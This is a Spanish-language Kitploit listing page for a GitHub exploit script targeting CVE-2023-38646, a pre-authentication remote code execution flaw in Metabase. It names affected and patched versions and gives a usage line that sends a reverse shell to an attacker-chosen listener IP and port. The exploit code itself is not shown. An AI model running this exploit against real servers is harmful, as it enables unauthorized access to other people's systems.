Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-38646 — Este script está diseñado para explotar versiones vulnerables del software Metabase, proporcionándote una shell como atacante. | Kitploit
Herramientas/GitHubGitHub/birdm4nw/cve-2023-38646
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubbirdm4nw/cve-2023-38646

CVE-2023-38646

Este script está diseñado para explotar versiones vulnerables del software Metabase, proporcionándote una shell como atacante.

Ver Repositorio
1hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-38646 - Metabase RCE

Metabase de código abierto anterior a 0.46.6.1 y Metabase Enterprise anterior a 1.46.6.1 permiten a los atacantes ejecutar comandos arbitrarios en el servidor, con el nivel de privilegios del servidor. No se requiere autenticación para la explotación. Las otras versiones corregidas son 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 y 1.43.7.2.

Si la versión de Metabase es vulnerable, este script te permitirá, como atacante, obtener una conexión de shell en el sistema objetivo.

Uso

root@kitploit:~
python3 CVE-2023-38646.py -u targetURL -lhost LISTEN_IP -lport LISTEN_PORT

Ejemplo

scriptCapture

Autor: @birdm4nw

Referencia

https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/

Descargar herramienta